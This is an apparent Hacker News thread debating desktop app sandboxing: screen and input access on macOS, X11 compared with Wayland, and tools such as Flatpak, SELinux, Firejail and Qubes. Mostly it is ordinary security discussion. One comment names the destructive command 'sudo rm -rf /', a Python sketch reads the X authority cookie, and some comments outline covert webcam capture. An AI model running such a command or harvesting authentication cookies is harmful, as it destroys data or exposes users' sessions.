Everything you install from the core Debian stable repositories is pretty much guaranteed not to have any actively malicious code. Otherwise it would be discovered and removed. All Debian packages are signed as part of the package-upload process. It's not perfect, but it's been good enough so far. This is a world that is now niche, but it used to be practical!

It's very depressing to be transitioning into a world where you can't use a small trusted open-source mail client and IM client etc, where you have to install crazy huge untrusted piles of flaky and inefficient code in order to interact with real-world people and institutions, and you can't easily control which version you have installed, and mobile devices become obsolete after just 3 years. (Even iPhones - not because of Apple, but because Instagram and Snapchat got too heavy/shitty for the older models! This does not happen for communication over SMTP or XMPP!)

So I see the "we need super sandboxes around every little thing" as a sort of bandaid on a much bigger problem which is not going to be fixed in the foreseeable future.


Like the XScreenSaver time bomb that caused a nag screen to pop up on people's screens on April 1 a year or two ago? Debian distributed this code for years without realizing it, because no one even glanced at the code. The developer didn't even try to hide the time bomb; he even provided angry comments explaining why he added it.

The only reason Debian hasn't distributed some really bad malicious code (that we know of) yet is that they got lucky and no developer has tried to mess with them.


You’re assuming all Debian packages are secure. Like wlesieutre said in a sibling comment, software from a trusted source can and often does have vulnerabilities.


The sandbox is designed to make that not expected behavior - even if, as demonstrated here, it has holes…


Since when? OSX has never outlawed this sort of thing.

The sandbox has always been completely different from iOS's; e.g. it doesn't ask permission to access photos, microphone, or webcam.


Wrong.

1) Your webcam turns a light on. Not a permission prompt, but you know what's going on.

2) "People must grant permission for an app to access personal information, including the current location, calendar, contact information, reminders, and photos."

https://developer.apple.com/macos/human-interface-guidelines...


Those are if you are using the APIs directly.

But you can always go straight to the files themselves for cases like Photos and Calendars and also to the SQLite databases that back a lot of user data.

And current location is easy to get on OSX. You can simply look up the user's IP address and WiFi networks to triangulate the user's location with about the same accuracy as Apple can do.

With the webcam, you can easily switch the camera on, take a photo, and switch it off. You could easily trick people into thinking it was a hardware fault rather than something nefarious in the app.

The fact is that none of what I listed above is possible on iOS.


That stuff is not possible if you have a sandboxed app from the Mac App Store.

Sure, if you download software from the web, it can do whatever it pleases.

But if you download apps only from the Mac App store, you should be safe.

On iOS, Apple checks all your software. On the Mac, they give you a choice: If you want "safe" software, go to the Mac App Store. If you want any software, go somewhere else.

The sandbox isn't as complete as on iOS, but the stuff you listed requires special permissions and confirmations when you get your software from the Mac App Store.


Aren’t files outside of your app inaccessible from within the sandbox, unless you give the app permission to read them? I mostly use non-Mac App Store apps, but one I use, The Unarchiver, needs permission to open files.


If my webcam light ever flickered on and then off, I'm chucking my laptop off the side of a bridge. Willing to bet most other people wouldn't attribute it to a hardware fault, either.


You could just cover it with a post-it instead of chucking it off a bridge.

The thing that bugs me is there’s no indication an app is connected to my microphone.


Thing is, at that point I'd be worried about the mic as well, as you point out.

Better safe than sorry!


Touché


Sandboxing isn't to prevent people from damaging their own computer (i.e., the "sudo rm -rf /" case), it's to impose a ceiling on how much damage can be done by an exploited process that the user doesn't realize has been exploited. It's not to save you from yourself, it's to save you from stuff that you wouldn't otherwise have any way of knowing was even happening. Sandboxing restrictions are more like using asserts in your code than anything else- they only stop programs from doing things that the programs themselves are stating that they would never attempt to do.

Having said that, plenty of useful apps can't ship in sandboxed form because of limitations in the current sandboxing model. And of course the fact that sandboxing is required for store distribution makes the store less useful. The implementation has much room for improvement, as do the store distribution policies.


Much work is being done on Wayland compositors and window managers to change this. Among the expected results are security improvements: the user is able to know which program is reading certain inputs and outputs, and can control that data. As a basic example, a desktop app can only read/write the pixels inside the rectangle assigned by the compositor, and it only receives keyboard events and mouse clicks sent inside this rectangle. I think this is an assumption one could make about a modern desktop. Sadly, not enough users care about this type of security, so we stick to the old, X11-style altruistic desktop computing where every program can see everything.


Couldn’t you just hook the Wayland compositor to detect where focus is and eat up all those inputs?


I submit that the macOS interface leads to a reasonable expectation of greater security than an old-school executable running in the 90's or 00's, because macOS requires that the user explicitly grant permission to access so many other sensitive resources, such as location and contacts.

If an app has to ask my permission to access my keystrokes, I think it's fair to assume the same would be true of apps that read (anything outside their own window regions) from my screen. The fact that macOS doesn't require this is discoverable by sleuthing (browsing the Privacy pane, or remembering that screenshot apps don't ask for it), but there are reasonable, and probably common, mental models under which it isn't obvious.

It would be like renting a house with four locks on the front door and none on the back. Yes, you could audit the house, but it's a weird asymmetry to have to look for.

(P.S. I'm older than you, FWIW :-)


Are you talking about High Sierra, or iOS devices? Because this just isn't true of my MacBook Pro running Sierra. There is no granular permissions model as in, for instance, Android 7. I give my (super)user password to install apps on my Mac, and after that they run. There are no further permissions I can or can't grant, and there's no way to install many desktop apps without my (super)user password.

Edit: It seems you and many of the others replying to the GP are talking about apps from the App Store, which I basically never use. And that's sort of the parent's point, I think. I get apps from the internet, install them, and use them, like an old-school desktop/PC user. I rarely need to use the App Store (except for updates, and it's weird UX that OS updates are in the App Store to begin with) and have no compelling reason to do so.


I'm talking about High Sierra, and apps loaded from App Store or non-store download links. For example, System Preferences > Security & Privacy > Privacy > Accessibility lists (among others) “Backup & Sync from Google”, BetterTouchTool, Dash, Dropbox, Google Chrome, Google Software Update, Keyboard Maestro, Little Snitch Agent. Many of these aren't even available from the app store. If I keep Accessibility unselected, some of these have degraded functionality. For example, I keep the Google apps and Dropbox unchecked, and then they can't annotate my Finder icons. (I'm okay with that.) I keep Dash unchecked, and keyboard snippets don't work.

You're right that this isn't super fine-grained. This single checkbox seems to govern several unrelated things, such as keystroke logging and insertion (Dash and Keyboard Maestro), mouse recording and control (Keyboard Maestro), and whatever APIs are used to badge Finder icons (Google and Dropbox). My belief is that an app that I haven't checked off there doesn't have access to my keystrokes. (Maybe this is wrong?) In which case I'm surprised there's nothing like this for recording the screen.


Even HTML5 web capture works in a similar way. Once you give a site like Discord access to your microphone or screen, it can pretty much access it whenever the page is open; granted, it will show a little badge on screen by default.

A lot of users got tired of the on-screen badge being on all the time and probably set it to hidden (very easy to do), so not everyone is actually aware of when an HTML5 application is accessing the microphone/camera/screen.


A small aside: on the Mac, Micro Snitch [1] can let you know about any app that accesses the mic or webcam. It can use overlays, notifications, and/or just the systray to indicate that an app is using the mic/webcam. It also has an activity log that can show you past use.

[1] https://www.obdev.at/products/microsnitch/index.html


My thought exactly. I was like, yes, of course!

How does he think that a desktop app can do so many different things?

Now, the sandbox is a different issue. But of course it has access to the screen.

If apps on the desktop are going to be as restrictive as on mobile, why use a desktop at all?


Are we ever going to end up with the practice of running every app in its own independent VM?

Should anything at all run in the host OS?

The advantage of running every app in its own VM is that apps won't necessarily get tossed aside in this constant arms race of upgrades, especially apps that don't need the internet. Imagine still actively using several perfectly good apps that were last updated 10 or 20 years ago.


> Should anything at all run in the host OS?

Isn't that equivalent to saying that the set of available kernel calls should be more restricted?

(User mode is a kind of sandbox, after all)


It is my understanding that that's what Flatpak is trying to do: "One of Flatpak’s main goals is to increase the security of desktop systems by isolating applications from one another. [...] Limited syscalls. For instance, apps can’t use nonstandard network socket types or ptrace other processes. " [0]

But as my other comment mentions [1], I wish I had the knowledge required to understand the meaning / implications of Flatpak apps. Please let me know if I'm misunderstanding :)

Happy Saturday night, y'all!

[0] http://docs.flatpak.org/en/latest/working-with-the-sandbox.h... [1] https://news.ycombinator.com/item?id=16351192


Not just the set of kernel calls but the scope of the calls themselves. A text editor should be able to fopen the file I’m editing, but it doesn’t need to be able to access ~/Documents/top-secret.txt. You can do this type of thing with SELinux, though I’ve yet to see it done in a user-friendly way.


You’re looking for capability-based systems.


A lot of the motivation to develop and push for Wayland is around security and privacy. Any program running on a computer with an X session, at the same or greater privilege than the user running it, can view anything on that screen, send any combination of inputs it wants, or steal the pointer/keyboard indefinitely.

At the end of the day, people don't care about security that much. Wayland is still getting there. It's getting better, particularly in the last year, but it's not a huge priority for many people, so it has taken upwards of ten years to become usable.


> At the end of the day people don't care about security that much. Wayland is still getting there. Its getting better, particularly in the last year, but its not a huge priority for many people so it has taken upwards of ten years to become usable.

I think many people are also not aware of how bad X11 security is. The other day I mentioned that X11 applications can read all keystrokes to someone who does system administration/security at an ISP. To my big surprise, he was not aware of this. (Didn't everyone play with xev at some point?)

On Linux, I only use Wayland because of X11's broken security model. Fortunately, it works very well these days with the amdgpu driver.


However, the way Wayland (or its broader ecosystem) "fixes" security is just stupid. Instead of using a fine-grained, whitelist-based permission system to grant different clients all the permissions they need to do their work (taking screenshots, reading the color of a point, listening for a certain key combination, applying some filtering to the display, getting the size/position of a different client, ...), it treats every client as untrustworthy, with no standard way to change that.

And let's not forget that just using Wayland doesn't grant any improved security compared to X11. There are numerous other ways to get input data, display contents, etc., so you need further sandboxing anyway, at which point you might just as well sandbox the X11 clients you don't trust and get the same security. The benefit there is that you can decide whether you trust your color picker and let it do its work by not sandboxing it, while Wayland just decides for you that no color picker can be trusted.


> However the way Wayland (or its broader ecosystem) "fixes" security is just stupid. Instead of using a fine grained whitelisting based permission system to grant different clients all the permissions they need to do their work

Because you can't do that in Unix. You can't ensure that the process with PID 1234 is really executing /usr/bin/foo.


Assuming other apps are sandboxed from /proc/1234, can't the shell just exec "/usr/bin/foo" and pass some file descriptors or secrets in environment variables?
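
As a sketch of that fd-handoff idea using plain POSIX inheritance (not an actual Wayland handshake; the "compositor" framing and the `TOKEN_FD` variable name are made up for illustration):

```python
import os
import subprocess
import sys
import tempfile

# A stand-in for a secret the "compositor" wants to hand only to a child
# process it launched itself.
with tempfile.NamedTemporaryFile("w", delete=False) as f:
    f.write("secret-token")
    path = f.name

# Open a descriptor and mark it inheritable so it survives exec (PEP 446
# makes descriptors non-inheritable by default in Python 3.4+).
fd = os.open(path, os.O_RDONLY)
os.set_inheritable(fd, True)

# Exec the child, telling it which descriptor to use via the environment.
# The child never sees the path; it can read only what it was handed.
child = subprocess.run(
    [sys.executable, "-c",
     "import os; fd = int(os.environ['TOKEN_FD']); "
     "print(os.read(fd, 64).decode())"],
    env={**os.environ, "TOKEN_FD": str(fd)},
    close_fds=False,  # keep inherited descriptors open across exec
    capture_output=True, text=True)

os.close(fd)
os.unlink(path)
print(child.stdout.strip())
```

The child prints the token it read through the inherited descriptor; an unrelated process that wasn't handed the fd has no way to get at it (modulo /proc, as the parent comment notes).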


How are the Wayland server and the shell going to share (or agree on) those file descriptors or secrets in the first place? And how can you ensure the shell is not a rogue one?


> How the wayland server and the shell are going to share (or agree to) that file descriptors or secrets in the first place?

I read that GNOME just implements both in the same program (and calls it "shell").

> Or how can you ensure that the shell is not a rogue one?

I'm confused. Do you mean this kind of attack would become somewhat more probable or more dangerous if the original shell had some mechanism of allowing certain apps to pick colors?


The reason the Wayland (or X11) protocol uses Unix sockets for communication is that there is no hierarchical relationship between a client process and the server process (they can even be from different user "sessions"). Also, a client can be launched from anywhere, including a "shell" such as an interactive /bin/bash session.


You can with SELinux, which is on all the major distros now, no?


I haven't heard about that, can you please provide a link?


A link to info about SELinux? It's a rather broad topic; you'll probably be better served googling for whatever aspect of it you're interested in, but it's definitely in Red Hat (even turned on by default [1]) and it's available on Debian (not sure if it's on by default there).

[1] https://access.redhat.com/solutions/3176 <--- here they show how to turn it off because it's in enforcing mode by default.


About how to use SELinux to ensure that a process with a certain PID is running the intended executable and that it hasn't been tampered with by the user (i.e. a rogue app running with user perms).


Well, you'd need to read up on how SELinux works to understand that.

Briefly, SELinux adds new permissions to files, new contexts to users, and so on; you specify what a given context is allowed to do, to a very granular level. For example, take postfix: it's split up into lots of programs, so you could say that the "init" context is allowed to run the postfix startup script but none of the rest of it. The postfix startup script transitions into a "postfix startup" context which is allowed to start the various programs but nothing else. So there will be a postfix process that accepts incoming IP connections and can send on a specific FIFO and nothing else. There is another program which can read from the FIFO, change certain files, and nothing else. So imagine you break into the program that talks to the internet: all you can do at that point is talk to the internet and talk to the FIFO. You can't read any files, write anything, execute anything, etc.

So that's kind of the idea of it. The above assumes an extremely tight SELinux configuration and no bugs in SELinux that would let you break out of your context. I've never seen a configuration as tight as described above, but there used to be a guy who ran a Debian Linux machine on the internet where you could log in as root and try to break stuff. As far as I know, no one ever hacked that machine, starting out as root in a bash shell.
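
In type-enforcement terms, the postfix example boils down to allow rules like the following. The type names resemble those in the SELinux reference policy, but this is an illustrative sketch, not a working policy module:

```
# The network-facing daemon may exchange data over its delivery FIFO...
allow postfix_smtpd_t postfix_public_t:fifo_file { read write };

# ...and nothing grants it access to user files, so reads of, say,
# user_home_t:file are denied by default -- there is simply no
# "allow postfix_smtpd_t user_home_t:file read;" anywhere in the policy.
```

Everything not explicitly allowed for a context is denied, which is what makes the "all you can do is talk to the FIFO" property hold.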


I fail to see how it can help in this case. The most fine-grained access you can achieve with SELinux is to objects such as files or ports. What you need here is the ability to check whether the other process has permission to invoke certain operations on the current server through the Wayland protocol. It would be like arbitrary capabilities, but linked not to the operating system but to specific applications.

For example, in order for the Color Picker Tool to work, The Gimp should be marked with a "color picking allowed" capability, so that when it asks the Wayland server for the color of pixels outside the surfaces it already owns, the server can check the capability and send the requested info. But a rogue program/process trying to scrape the screen content pixel by pixel shouldn't be able to do that. The inability to safely map processes to executables in Unix (and the possibility of manipulating their running code via exec(), library injection, ...) makes this a very hard problem to solve without a paradigm shift that SELinux doesn't provide (as far as I can tell).


Oh, I see. Yes, I don't think SELinux could do exactly the scenario you describe, because the things you're mentioning don't exist at the OS level. If you can figure out a way to make them something SELinux can attach a context to, then it would be possible.


Since I run only reasonably trusted open-source software on my computer, the sandboxing aspect of Wayland doesn't really help me. The one exception is the browser, as those things now expose a vast attack surface. Unfortunately, browsers are not sandboxed, and they become significantly less functional if you somehow manage it. I don't care that my browser can't see the rest of the screen if it can see all my files and everything I do in other tabs of that browser.

So the benefits of the easier sandboxing provided by Wayland are somewhat overstated, at least for typical Linux users.


You can run the browser process in a separate mount namespace, only allowing it to access, for example, downloads folder, while everything else is off limits. I recommend Firejail.
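
For example (the flag is from Firejail's manual; the exact paths are illustrative):

```
# Mount a tmpfs over $HOME and make only ~/Downloads visible inside it;
# everything else in the home directory is off limits to the browser.
firejail --whitelist=~/Downloads firefox
```

Under the hood this is the mount-namespace trick the parent describes: the browser sees a mostly empty home with just the whitelisted directory bind-mounted in.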


Permission dialogs for rare dangerous behaviors can work, I think. You have to do it the way Apple does it, though, not the way Android does.

Like, how often does software need to take screenshots? Not often. Same with most other app permissions. Most apps only need network access and a folder.


I'm afraid apps will abuse these permissions. For example, the Facebook app (or a banking app) shouldn't quit if I refuse it a permission. I can't even use the default native email app (edit: on Android) with Exchange without giving the Exchange server remote administration access. Makes no sense.


That is why permission state needs to be hidden from / discouraged for apps. No permission just gives you empty data sets. Apps should also be rejected from the app store if they try to circumvent this, unless it's a central feature of the app, like a screenshot app or a location-tracking app.

With the permission model of apps, then we can start having system apps like istat menus being sold on the app store again too.

I think you haven't used iOS that much. In practice it's fairly rare for an app to shut down without a permission unless it's central to the app.


In fact, it's against the App Store guidelines to refuse to work without a permission (unless it's central to the app).


The Exchange server requesting remote permission is a "feature" which allows you or your company's Exchange server admins to send remote wipe command to the handset if it's lost or you leave the company. Not the specific fault of the permission model of the phone, it's part of the activesync suite.


You can use the default email application on Android with services that don't demand remote-wipe controls. Exchange does demand them; that's how ActiveSync works. If you don't want that, use IMAP or POP3.


How is the Android way different? We're two major and four minor versions past the point where individual permission requests were added.


Android AFAIK shows a large laundry list of permissions you need to accept when you install an app, which you can revoke after the fact. On iOS there is no laundry list to accept, and the built-in annoyance of permission alerts discourages apps from requesting permissions they don't need.

Also, Android takes a while to propagate new versions to the majority of the install base :)


You just replied to a post stating that this changed years ago.


> Imagine still actively using several perfectly good apps that were last updated 10 or 20 years ago?

I regularly use Borland C++ 5 (because it has a nice enough customizable IDE and a very fast C compiler which is practically instant on modern PCs), which (IIRC) was released in 1996. And I also use a ton of other stuff from the 90s, including many games.

Things already work without the overhead and resource wastage of virtual machines; all it takes is for OSes and libraries to try not to break their ABIs.


We're there, check out Qubes OS


Great when it works; it's one of the few Linux variants that still sometimes just doesn't like to run on certain hardware.


> The advantage of running every app in their own VM means that apps won't get necessarily tossed to the side in this constant arms race of upgrades, especially for apps that don't need internet. Imagine still actively using several perfectly good apps that were last updated 10 or 20 years ago?

Not "especially for apps that don't need the Internet", only for apps that don't need the Internet. Anything that connects to the Internet needs constant and rigorous update discipline to stay ahead of a constant stream of exploits.

Sandboxing applications within their own VMs leads to a false sense of security. Now whoever is responsible for distributing the app is responsible for distributing the OS that runs the app as well. If the underlying OS doesn't get updated, Murphy guarantees that there will be an OS-level exploit within that VM. And then, even if the exploit is sandboxed to only affect that app and its OS, the attacker still owns anything that the user passes through that app, including but not limited to usernames and passwords (which are often reused across websites and apps), any sensitive information that passes through the app (banking and financial accounts, anybody?), and any privileges existing within the VM (session tokens, client keys, privileged access / firewall passthrough to other machines on the local network, etc.).

It's one thing to sandbox each app within its own userland-level sandbox, but sandboxing each app within its own VM / OS only makes security even more difficult. That kind of deployment model only makes sense if a sysadmin is doing so to make deployments more predictable and has the full power to reinitiate deployments when OS updates are released. On an end-user level, you're either risking the end-user's security (if upstream controls the OS update) or wasting the end-user's resources.


Imagine still actively using several perfectly good apps that were last updated 10 or 20 years ago?

I do. I don't know exactly what my oldest binary is, but it's probably from the 80s (some text processing utilities), and I still actively use apps I wrote myself over a decade ago. Of course, I use Windows which has historically been far better at backwards compatibility than Mac OS.


That's essentially what Docker containers have done to server-side applications. Every application is isolated from the host in a container and bundled with only the dependencies it needs. The only shared component is the kernel and anything you mount into it from the host.


I tried doing this when I got a new MacBook Pro. The problem is all these damn pixels make it impossible to even quarantine the web browser unless you're willing to let VMware patch your macOS kernel (uh, no thanks).


Check out QubesOS.


I get that this is about the Mac apps, but doesn't this apply to any general OS? On Windows this is trivial, on any Linux distro using X11 too.


Just goes to show that not all sandboxes are created equal (though I don't think I've ever even used a properly sandboxed Windows or Linux app, so those OSes don't get any points anyway). For example, reading other tabs or processes out of the web browser sandbox isn't possible short of exploits like Spectre and Meltdown, and even seeing something like the history of visited links requires cleverly tricking the user (and coarse guesswork) e.g. https://tinsnail.neocities.org/ and http://lcamtuf.coredump.cx/yahh/ . I imagine the behavior in the OP is impossible on both Android and iOS too?


There was a pre-Spectre proof of concept of a program telling what tabs you have open in your web browser: https://github.com/defuse/flush-reload-attacks

This was a program rather than another webpage, and I haven't bothered to read how it worked beyond the general idea of exploiting a cache side-channel. I expect the bit-rate is low compared to Spectre/Meltdown. But it made me leery of confidentiality in current systems.


I think you have the idea of a sandbox (or at least the idea of a sandbox in the context of a web browser) backwards: it means an application (webpage) running inside the sandbox cannot access resources not granted to it. This side-channel attack does not run inside a sandbox at all.


If you don't consider an OS process a sandbox at all, why are we even talking about security here?


That’s not the point of GP though? The whole premise of virtualization is that an OS process is not a perfect sandbox. There’s a hierarchy of sandboxes. Protecting other processes from accessing something inside the sandbox is not the job of a browser sandbox. This actually just goes to show the GP’s point: not all sandboxes are created equal.


I was not arguing against kibwen, I was sharing some more points. People have implicitly expected OS processes to be better isolated from each other than they are. (I think there's a related problem that people tend not to think about which of the properties of integrity, confidentiality, and availability they rely on.)


You might not be able to escape the browser's sandbox, but you can certainly escape your tab's sandbox and spy on other tabs using timing attacks: https://www.usenix.org/system/files/conference/usenixsecurit...


If you've used Chrome, you've used a properly sandboxed app on both. I believe Firefox also now uses the Chrome sandbox on Windows. And this is definitely not routine to accomplish on iOS or Android.


I think what's concerning is that advertising that an app is in a sandbox suggests to those out of the know that they can use it safely. They expect that the integrity and privacy of their information will be preserved. That expectation does not exist with ordinary win32 or Linux programs.

Are windows store apps sandboxed? If so, is it trivially easy to do this with those? Or is it just win32?


True UWP apps are sandboxed and probably can't do this. They have access to a limited version of the Win32 API, I believe.


X11 is way worse; any app can subscribe to events of any other app, making keyloggers and other nastyware a piece of cake.


This is a feature, not a bug: it is how you can compose an environment out of reusable components that each do one thing by themselves. Tools like xbindkeys and xdotool work using this feature, and the composability of X is how you can use the file manager from KDE with a standalone window manager like i3 and a separate compositor (or no compositor). X is highly composable, even if many applications ignore that feature. If you know what you are doing, you get a lot of power and flexibility with X, way more than with any other window system (including Windows).


Proper/secure composability is designed not by exposing all internals, but through explicit APIs. For example, UNIX file descriptors and their use as stdin/stdout/stderr are a properly exposed API for reusable components, while the ability to plug into any function in the binary would not be.


X11, i.e. some of its implementations, doesn't expose all internals, and clients don't just plug into any function in the binary. The X11 protocol and some of its extensions clearly define how clients can communicate with each other or with the server.

Wayland on the other hand does not. Whether and how clients can communicate with each other is considered out of scope for the Wayland protocol, with a few exceptions (e.g. copy/paste), so it's up to the Wayland compositor. That's why there are already multiple different "APIs" for taking screenshots on Wayland compositors, some more powerful, some less, and not a single one is implemented by all major compositors - basically fragmentation hell. That's also why things like color pickers still don't work without tedious hacks (e.g. misusing some of the screenshot APIs).


It doesn't expose its internals; the equivalent of UNIX file descriptors in X is the XID (Window, Pixmap, etc). Much like you can give any process any file descriptor to work with, you can also give any process any XID to work with. And just as you can combine the text output of processes by redirecting their stdio, you can combine graphical output by combining their elements (it isn't exactly equivalent, of course, partly due to the increased complexity inherent in GUI applications but also due to little standardization and tooling; still, several elements in an X desktop - outside GNOME and KDE, which implement their own functionality that ignores X - work like that).


> any app can subscribe to events of any other app

Yes, that's a feature I have used many times in the past. If you want to sandbox an app, run it through a nested X server.


Indeed.

And for Windows, more than once I wrote stuff that captures or injects keystrokes globally. Being able to do this is a feature that lets you solve problems by making things more interoperable.


AFAIK you can't get any hardware acceleration that way.


Depends on the X server. I think Xnest uses just a dumb framebuffer, but Xephyr can use acceleration just fine.


Wow, I have a lot to learn... Do you know if these sorts of things are still possible on Wayland? What about a Flatpak app on Wayland, does that help? Because I think I've read somewhere that Flatpak apps on X11 were this way, implying that with Wayland they aren't. I wish I had more time to dive into this sort of stuff...

Flatpak does aggressively isolate apps from the OS though: http://docs.flatpak.org/en/latest/working-with-the-sandbox.h...


Wayland indeed closes a lot of these huge holes. It's one of the core reasons for its introduction.

Flatpak has no X11 sandbox. Others, like Firejail, have attempted to create X11 sandboxes, but they've had holes (last I tested they had the X RECORD extension enabled, which has no use except being a keylogger), or broke valid applications / accessibility tools.


No, Wayland doesn't close any of those huge holes. That's like saying: We removed all the windows to your house, you should now be safe from people spying on you or stealing your stuff.

Wayland doesn't grant Wayland clients permission to those resources, but without further sandboxing and using technologies like Linux namespaces, AppArmor, SELinux, ... that's completely useless in itself. Wayland only makes it harder/impossible for trustworthy applications to do their job, while malicious applications just take one of the many other routes to get what they want.


> Wayland doesn't grant Wayland clients permission to those resources, but without further sandboxing and using technologies like Linux namespaces, AppArmor, SELinux, ... that's completely useless in itself. Wayland only makes it harder/impossible for trustworthy applications to do their job, while malicious applications just take one of the many other routes to get what they want.

What you described is exactly the purpose of Flatpak; I think it even used SELinux for it. AFAIK, Flatpak with Wayland is a good way to sandbox apps on Linux.


A good way to sandbox applications is where you get a secure system without much effort but you still can grant applications certain privileges, because as a matter of fact some applications just need access to sensitive data to do their work. With Wayland that's basically impossible, since there's no standardized way to grant your hotkey manager access to the global input, or your color picker permission to read the color of an arbitrary pixel on the screen, ... It's security by not doing anything.

With X11 on the other hand I can sandbox X11 clients I don't trust, thereby limiting them in what they can do, but other clients I do trust have the ability to do all sorts of great things so I can do my work efficiently. While not perfect, not even close, it's certainly better than not being allowed to do anything.


Windows 10 closed this hole.


How so? In java I can access all screens without requesting a permission.


Windows NT (way back to its original 3.1 release) always had the idea of multiple independent desktops where applications can't cross-interact. If you use runas to run GUI applications under different user contexts, you might notice that some things like drag-and-drop and the clipboard don't work, and also screen recorders won't work ... Most users never use this functionality normally, but you might notice sometimes if you do "Run As Administrator" and the applications don't quite integrate with non-admin apps.


Oh, so that's how this works. I've noticed this through occasionally broken copy-paste between normal and "elevated" apps. Never realized it's a separate feature, not just a forced sandboxing between regular and "elevated" apps. Thanks!


In store applications without full-trust permissions, you cannot.


Store applications are not the only applications on Windows 10. Closing holes in store applications alone does not close all the holes.


This article is addressing sandboxed applications.

Regular applications, yes, you can pretty much do whatever in userspace in Win/Mac/X11. If you're going to create a new sandbox environment for applications (Windows Store/MacOS store) in today's world, it really needs to be locked down with explicit permissions for each type of I/O access.


On Linux, Wayland fixes this (+ allows for other security features, e.g. to protect the clipboard).


You can trivially sandbox X11 apps by running them in a nested X server.


And a separate user account, otherwise they can just connect to the original X server. (And on almost all existent Linux systems, either running as a separate user isn't trivial or the sandboxing process has root.)


Is a separate user account necessary if the Xauthority cookie is shadowed in the sandbox? I think firejail's nested X server setup works this way, without a separate user account.


What prevents you from reading the Xauthority cookie out of disk / an existing process's environment / out of an existing process's memory / etc.? You need a sandbox to prevent it from doing these things, which is certainly doable, but much harder than just opening a new X server.

(On a system without Yama enabled, you can also ptrace any other process running as the same user and run code as it, e.g., using gdb, but lots of desktop-focused Linux distros enable Yama to close this particular approach.)
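To illustrate why the cookie alone is not a barrier: it lives in an ordinary file, so any unsandboxed process running as the same user can read it. A sketch (path resolution follows the usual XAUTHORITY convention):

```python
import os
from pathlib import Path

def read_xauthority():
    """Return the raw X authority data, or None if there is none.
    Nothing but ordinary filesystem permissions stands between a
    same-user process and this cookie."""
    path = Path(os.environ.get("XAUTHORITY") or Path.home() / ".Xauthority")
    try:
        return path.read_bytes()
    except OSError:
        return None
```

Parsing out the MIT-MAGIC-COOKIE-1 entries from those bytes is straightforward, which is exactly why the sandbox, not the cookie, has to do the protecting.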


> What prevents you from reading the Xauthority cookie out of disk / an existing process's environment / out of an existing process's memory / etc.?

The sandbox does.

> You need a sandbox to prevent it from doing these things, which is certainly doable, but much harder than just opening a new X server.

Of course. I never said simply running a new X server is sufficient. All I asked is if the sandbox needed to run the program in a separate user account.


How many apps do this?


If you trust an application to properly limit itself in what it can do by requesting a sandboxed environment, just so you don't have to type a few additional letters, you might just as well run it without a sandbox.

Hey kind stranger who is supposed to do the garden while I go shopping, I really don't trust you. So to be sure you only do the garden and nothing else, here are the keys to my house, please ensure that every door and window is locked. Thanks.

The only other entity who could set it up for you, so that every application automatically launches in a sandboxed environment, is the distributor; but then again it's your responsibility to choose a distribution that does that.

If you want security you have to do something about it at one point or another.


I think this is the wrong attitude. No one is better suited to implement a sandbox than the developer of the application. The fact that most developers are not trained to do so is just a reflection of our field's terrible progress in educating devs on secure app development.

Leaving this to the user leaves the vast majority of users unsafe. This is an unacceptable state.


Why should an application developer implement a sandbox? That's a huge waste of time and it's much more efficient if the operating system or the user enforces it instead by using existing sandboxing technologies like firejail. It is also untrustworthy and insecure, since after all you don't trust the application. If an application is responsible for sandboxing itself it can also choose not to sandbox itself properly if it wants to do harm.

There is no way around you either taking care of that yourself or you choosing an operating system that enforces it for you, like Qubes OS.


> Why should an application developer implement a sandbox?

Because they are the ones who understand the necessary capabilities of their program and the ones who have access to the source code...

> That's a huge waste of time and it's much more efficient if the operating system or the user enforces it instead by using existing sandboxing technologies like firejail.

Actually it's a far better sandbox when built into the program. And it doesn't leave users relying on installing arcane operating systems or becoming technically savvy.

> It is also untrustworthy and insecure, since after all you don't trust the application.

No, trusting the application is implicit since it's installed by the user. The sandbox exists to protect against a compromised application.


I, the user, do that. It's not the app's responsibility.


So apps need to ask for location but not to see everything you do? WTF


I imagine a world where every application that wanted to read and write to displays was required to go through an authorization flow before it worked?

That sounds terrible. This behavior is how desktop applications are meant to work. I’m surprised this surprised anyone.


A desktop application has a need to instruct the OS to draw its window. That can be reasonably unprivileged--an app owns its windows; this is easy. Most applications have no need to read raster data from their own windows. Even fewer have a need to read raster data from the desktop itself.

Desktop applications are not "meant to" have access they don't need. They sometimes have that access as an accident of history, but they are not "meant to"; we've known about the principle of least privilege for a long time. And the MacOS sandbox (which, to be honest, doesn't work very well, but that's neither here nor there) is intended to enforce application privileges and reduce escalation.


Please humor me, why in the world does an app need to read/write your screen? It is provided a window for that.

If it doesn't need to read/write your screen in order to provide its features, and then does it, wouldn't you agree that something is fishy? Wouldn't you like to know when fishy things are going on?

What is the point of security if any app you download can see everything you do?


> Please humor me, why in the world does an app need to read/write your screen?

The most obvious answer would be to take screenshots, like GIMP's "Create from screenshot" command or a dedicated program like the Snipping Tool in Windows. Many graphics tools offer that functionality, even some that you can run from the command line.

Other, similarly widely available, functionality is recording the desktop - a common need for screencasting and video streaming (think Twitch) programs. These also need to capture audio. A more niche case is a tool that captures directly to GIF files (I have such a tool on both Windows and Linux).

A less commonly implemented but still very useful piece of functionality is remote access/remote desktop (in which case you need to capture input events and also create fake input events indistinguishable from the user's events).

Finally, several utilities also benefit from being able to read the screen: utilities that magnify and perhaps enhance part of the screen (useful for people with sight issues, or for developers inspecting the output of a graphics program at the pixel level without flattening their face against the monitor), color pickers, or even just funny toys that manipulate the screen contents (I've seen a game in the past grab a screenshot of your desktop and then zoom it out when you launch it).

> What is the point of security if any app you download can see everything you do?

I'd turn that around: what is the point of security if the apps you download cannot do their job because of it? At the end of the day computers need to be useful, not to be burned and buried in a waste disposal field (where they'd be in their most secure state).


> not to be burned and buried in a waste disposal field (where they'd be in their most secure state)

This is just a simple strawman.

It's not that hard to have a middle ground: just disallow apps from using things like your webcam or screen without your explicit permission. Just because one program uses that functionality doesn't mean it needs to be available to every single program you ever run.

iOS already manages this. Just have a notification pop up when you use the program to allow X access from system settings. Certain programs already do something similar by requesting access from Accessibility, like window managers (albeit that's to get around certain limitations).
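The flow described above (prompt on first use, then remember the decision) can be sketched roughly like this; the names are hypothetical, and on real platforms the broker lives in the OS, not the app:

```python
class PermissionBroker:
    """Toy model of first-use permission prompts with remembered answers."""

    def __init__(self, prompt):
        self._prompt = prompt      # stands in for the OS permission dialog
        self._decisions = {}

    def request(self, app, capability):
        key = (app, capability)
        if key not in self._decisions:
            # Only the first request for this (app, capability) pair
            # interrupts the user; later requests reuse the answer.
            self._decisions[key] = self._prompt(app, capability)
        return self._decisions[key]
```

The point of caching the answer is exactly the "annoyance budget" discussed here: the user is asked once per capability, not on every use.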


